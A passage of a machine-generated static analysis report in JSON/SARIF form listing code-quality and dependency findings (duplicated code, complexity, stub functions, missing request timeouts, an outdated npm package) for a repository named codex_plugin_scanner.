"scanner": "repobility-threat-engine", "fingerprint": "1c404714fa52c6b2043d00abb287132ae1956ff397c31bbea842f708d03563c4", "category": "quality", "severity": "low", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 14 (severity threshold for low: 8+).", "evidence": {"scanner": "repobility-threat-engine", "function": "check_hooks_and_skills", "breakdown": {"if": 4, "for": 1, "except": 2, "ternary": 1, "continue": 1, "nested_bonus": 5}, "complexity": 14, "correlation_key": "fp|1c404714fa52c6b2043d00abb287132ae1956ff397c31bbea842f708d03563c4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/claude.py"}, "region": {"startLine": 221}}}]}, {"ruleId": "DEPCUR-NPM", "level": "note", "message": {"text": "npm package `tsx` is minor version(s) behind (^4.8.1 -> 4.22.4)"}, "properties": {"repobilityId": 144977, "scanner": "repobility-dependency-currency", "fingerprint": "be7c61c20601e193be4225ed902575f42ed26abdbd73272fd3998450c14f54d4", "category": "dependency", "severity": "low", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "minor version(s) behind", "signal": "currency", "cwe_ids": [], "package": "tsx", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "4.22.4", "correlation_key": "fp|be7c61c20601e193be4225ed902575f42ed26abdbd73272fd3998450c14f54d4", "current_version": "^4.8.1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144872, "scanner": "repobility-ai-code-hygiene", "fingerprint": "9f814eada541e0f62f56b8f50427ff5c5f59f691d41a577e06a68ccd124c220b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "tests/guard_python_phase12_support.py", "duplicate_line": 7, "correlation_key": "fp|9f814eada541e0f62f56b8f50427ff5c5f59f691d41a577e06a68ccd124c220b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/guard_tier2_phase13_support.py"}, "region": {"startLine": 7}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144871, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d7534c7da1d0d6132c35f9d36b80342a2d5d3d0d3d73cd68be29e09f600af4a6", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/reporting.py", "duplicate_line": 183, "correlation_key": "fp|d7534c7da1d0d6132c35f9d36b80342a2d5d3d0d3d73cd68be29e09f600af4a6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/verification.py"}, "region": {"startLine": 81}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144870, "scanner": "repobility-ai-code-hygiene", "fingerprint": "3d7f1cbe4762567a58c9fa28bd69344fe09d71e398c3a7865246a4c9693d5519", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/runtime/skill_protection.py", "duplicate_line": 372, "correlation_key": "fp|3d7f1cbe4762567a58c9fa28bd69344fe09d71e398c3a7865246a4c9693d5519"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/supply_chain.py"}, "region": {"startLine": 417}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144869, "scanner": "repobility-ai-code-hygiene", "fingerprint": "ba80a1910d06e25bc2bc05a57082cc8c47537b7a39556250a9cb4bf9b4905789", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/runtime/decisions.py", "duplicate_line": 194, "correlation_key": "fp|ba80a1910d06e25bc2bc05a57082cc8c47537b7a39556250a9cb4bf9b4905789"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/signals.py"}, "region": {"startLine": 200}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144868, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d75046f64dd4baff596a388866d4f33fce7ba31fb098fc269ced4cda66b924b3", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/guard-types.ts", "duplicate_line": 18, "correlation_key": "fp|d75046f64dd4baff596a388866d4f33fce7ba31fb098fc269ced4cda66b924b3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/signals.py"}, "region": {"startLine": 8}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144867, "scanner": "repobility-ai-code-hygiene", "fingerprint": "10ec175e6757711694964a2a14f9557d72be43fcb764f010adf18730c1486725", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/runtime/data_flow.py", "duplicate_line": 277, "correlation_key": "fp|10ec175e6757711694964a2a14f9557d72be43fcb764f010adf18730c1486725"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/shell_commands.py"}, "region": {"startLine": 123}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144866, "scanner": "repobility-ai-code-hygiene", "fingerprint": "5ccdaa7006e3f724ba372093855227d16370a2648ca36051d75e595233020305", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/guard-types.ts", "duplicate_line": 18, "correlation_key": "fp|5ccdaa7006e3f724ba372093855227d16370a2648ca36051d75e595233020305"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/detectors.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144865, "scanner": "repobility-ai-code-hygiene", "fingerprint": "ea8db5a55c8eaaba678e5b9e8bd94db3c7a04255df36d4fc36fe3718d378ddaa", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/capabilities.py", "duplicate_line": 11, "correlation_key": "fp|ea8db5a55c8eaaba678e5b9e8bd94db3c7a04255df36d4fc36fe3718d378ddaa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/risk.py"}, "region": {"startLine": 14}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144864, "scanner": "repobility-ai-code-hygiene", "fingerprint": "e63814fbe6c9050a9d9cd443b4c7bc6260baa97e5c68e098cc3fbe824d637418", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/use-resolved-approval-gate.ts", "duplicate_line": 11, "correlation_key": "fp|e63814fbe6c9050a9d9cd443b4c7bc6260baa97e5c68e098cc3fbe824d637418"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/use-resolved-approval-gate.js"}, "region": {"startLine": 51}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144863, "scanner": "repobility-ai-code-hygiene", "fingerprint": "7b8455abaefbb65670093af372ab7b7461ffc49848f8877e3379236ff5dcc71b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/use-focus-trap.ts", "duplicate_line": 30, "correlation_key": "fp|7b8455abaefbb65670093af372ab7b7461ffc49848f8877e3379236ff5dcc71b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/use-focus-trap.js"}, "region": {"startLine": 30}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144862, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d9bd3c0b3eef46c8e732b1b47bed3603f279746481b5201caff13ec565eb359f", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/runtime-overview.tsx", "duplicate_line": 78, "correlation_key": "fp|d9bd3c0b3eef46c8e732b1b47bed3603f279746481b5201caff13ec565eb359f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/runtime-overview.js"}, "region": {"startLine": 3}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144861, "scanner": "repobility-ai-code-hygiene", "fingerprint": "2cd96e0b2bcf35b3bbf6969e1b825f4d583db5429959477534720c65f5b5820f", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/audit-workspace.tsx", "duplicate_line": 78, "correlation_key": "fp|2cd96e0b2bcf35b3bbf6969e1b825f4d583db5429959477534720c65f5b5820f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/audit-workspace.js"}, "region": {"startLine": 24}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144860, "scanner": "repobility-ai-code-hygiene", "fingerprint": "b35a120a6417077e0c1a0004732165f650d1c579dee55107236c4815a21fa655", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/apps/app-catalog.ts", "duplicate_line": 125, "correlation_key": "fp|b35a120a6417077e0c1a0004732165f650d1c579dee55107236c4815a21fa655"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/app-catalog.js"}, "region": {"startLine": 81}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144859, "scanner": "repobility-ai-code-hygiene", "fingerprint": "2a001f1986607bc9df69eae832b33507b74bf027dc118726de13edbd7958535b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/adapters/copilot.py", "duplicate_line": 719, "correlation_key": "fp|2a001f1986607bc9df69eae832b33507b74bf027dc118726de13edbd7958535b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/opencode.py"}, "region": {"startLine": 427}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144858, "scanner": "repobility-ai-code-hygiene", "fingerprint": "6fe0fcfd36aefe99446fb3310f8a4f29a85a642905b1fb948421a636b8c7233c", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/opencode.py", "duplicate_line": 18, "correlation_key": "fp|6fe0fcfd36aefe99446fb3310f8a4f29a85a642905b1fb948421a636b8c7233c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/openclaw_config.py"}, "region": {"startLine": 77}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144857, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1c7a2e332ec63b26a9d999c5da4568dcda5eba5b4143e3ae8f693b7ba389e54b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/adapters/hermes.py", "duplicate_line": 213, "correlation_key": "fp|1c7a2e332ec63b26a9d999c5da4568dcda5eba5b4143e3ae8f693b7ba389e54b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/openclaw.py"}, "region": {"startLine": 58}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144856, "scanner": "repobility-ai-code-hygiene", "fingerprint": "88f0a69ad8437d4b86a8d0e936f6aefd83d15ee69268c1de4cf9eaa7fcd3090f", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/claude.py", "duplicate_line": 2, "correlation_key": "fp|88f0a69ad8437d4b86a8d0e936f6aefd83d15ee69268c1de4cf9eaa7fcd3090f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/opencode.py"}, "region": {"startLine": 2}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144855, "scanner": "repobility-ai-code-hygiene", "fingerprint": "95129ba7f4f3f36cb9abbc8e20b498eeae01ff73ccaf1b011b4b7373b988756a", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/claude.py", "duplicate_line": 2, "correlation_key": "fp|95129ba7f4f3f36cb9abbc8e20b498eeae01ff73ccaf1b011b4b7373b988756a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/gemini.py"}, "region": {"startLine": 2}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144854, "scanner": "repobility-ai-code-hygiene", "fingerprint": "8499d0e80404994f00c4ce1c5d105a171565b852959a9db11905855bf9381515", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/claude.py", "duplicate_line": 2, "correlation_key": "fp|8499d0e80404994f00c4ce1c5d105a171565b852959a9db11905855bf9381515"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/codex.py"}, "region": {"startLine": 2}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144853, "scanner": "repobility-ai-code-hygiene", "fingerprint": "df81000a30e7712220cc2b3ef9840344fa5d457890f9e0d2ea91287c15e85c49", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/history-analytics.tsx", "duplicate_line": 326, "correlation_key": "fp|df81000a30e7712220cc2b3ef9840344fa5d457890f9e0d2ea91287c15e85c49"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/history-charts.tsx"}, "region": {"startLine": 401}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144852, "scanner": "repobility-ai-code-hygiene", "fingerprint": "899e523a79f506a56843fcd0371e1018a6d2005839439f8631ff7ac0f7af2ca8", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/evidence/app-tab.tsx", "duplicate_line": 177, "correlation_key": "fp|899e523a79f506a56843fcd0371e1018a6d2005839439f8631ff7ac0f7af2ca8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/category-tab.tsx"}, "region": {"startLine": 109}}}]}, {"ruleId": "MINED043", "level": "none", "message": {"text": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"repobilityId": 145019, "scanner": "repobility-threat-engine", "fingerprint": "3b87f66ce34b26b5476f51a8962199e1cada9d172515b80f541b153b961d4e32", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "http-not-https", "owasp": "A02:2021", "cwe_ids": ["CWE-319"], "precision": 0.917, "promoted_at": "2026-05-18T14:01:32.347999+00:00", "triaged_in_corpus": 12, "observations_count": 4113831, "ai_coder_pattern_id": 15}, "scanner": "repobility-threat-engine", "correlation_key": "fp|3b87f66ce34b26b5476f51a8962199e1cada9d172515b80f541b153b961d4e32"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/models.py"}, "region": {"startLine": 219}}}]}, {"ruleId": "MINED067", "level": "none", "message": {"text": "[MINED067] Python Requests No Timeout: requests.get/post/etc. without timeout= can hang forever."}, "properties": {"repobilityId": 145016, "scanner": "repobility-threat-engine", "fingerprint": "41e325cca49ff01fc1cffaec68c4345a863a4de1823b6f7fa49d88130b2bb65b", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-requests-no-timeout", "owasp": null, "cwe_ids": ["CWE-400"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348058+00:00", "triaged_in_corpus": 12, "observations_count": 45429, "ai_coder_pattern_id": 122}, "scanner": "repobility-threat-engine", "correlation_key": "fp|41e325cca49ff01fc1cffaec68c4345a863a4de1823b6f7fa49d88130b2bb65b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/bridge/__init__.py"}, "region": {"startLine": 103}}}]}, {"ruleId": "SEC013", "level": "none", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "properties": {"repobilityId": 145013, "scanner": "repobility-threat-engine", "fingerprint": "cf0fa57966ff874fffc921a07cba5bdb97333460e3807666e7f68fe460b50691", "category": "path_traversal", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 2 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 2 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|cf0fa57966ff874fffc921a07cba5bdb97333460e3807666e7f68fe460b50691"}}}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function (and 3 more): Same pattern found in 3 additional files. Review if needed."}, "properties": {"repobilityId": 145009, "scanner": "repobility-threat-engine", "fingerprint": "97e83b35d6d87ad95e23d12f8a95338efdb63b7f12c389b8e08fe5a80cf94e6e", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 3 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|97e83b35d6d87ad95e23d12f8a95338efdb63b7f12c389b8e08fe5a80cf94e6e", "aggregated_count": 3}}}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 145008, "scanner": "repobility-threat-engine", "fingerprint": "7bf695b3d28870a17b7d1a369182a9cc8cba258bf7d96f74968e54bbfd1ffd07", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|7bf695b3d28870a17b7d1a369182a9cc8cba258bf7d96f74968e54bbfd1ffd07"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/gemini.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 145007, "scanner": "repobility-threat-engine", "fingerprint": "046b57a728c7aab60017a0097698356f12c230b1136e825bb18ba52eb7b94fba", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|046b57a728c7aab60017a0097698356f12c230b1136e825bb18ba52eb7b94fba"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/codex.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 145006, "scanner": "repobility-threat-engine", "fingerprint": "5c592878872f29c7e201397397b083020d8504fc2888c4732796eba3ea3308d4", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|5c592878872f29c7e201397397b083020d8504fc2888c4732796eba3ea3308d4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/claude.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "MINED001", "level": "none", "message": {"text": "[MINED001] Bare Except Pass (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "properties": {"repobilityId": 145005, "scanner": "repobility-threat-engine", "fingerprint": "95cc9797c40c926759aaa04a4225f0a4ae4f9faafb543c58446c2f46cd9cfe9e", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 2 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|95cc9797c40c926759aaa04a4225f0a4ae4f9faafb543c58446c2f46cd9cfe9e", "aggregated_count": 2}}}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields (and 19 more): Same pattern found in 19 additional files. Review if needed."}, "properties": {"repobilityId": 145001, "scanner": "repobility-threat-engine", "fingerprint": "7c3f5fea021fd360bf7e98fcf069f53a04216cdd0d8f799e773ac5bfb2132889", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 19 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|7c3f5fea021fd360bf7e98fcf069f53a04216cdd0d8f799e773ac5bfb2132889", "aggregated_count": 19}}}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 145000, "scanner": "repobility-threat-engine", "fingerprint": "60eeda2adc88b9a08ecc1a3745babe98efeecbf840c4c4533d9424fe2b44c025", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|60eeda2adc88b9a08ecc1a3745babe98efeecbf840c4c4533d9424fe2b44c025"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/mcp_servers.py"}, "region": {"startLine": 14}}}]}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished 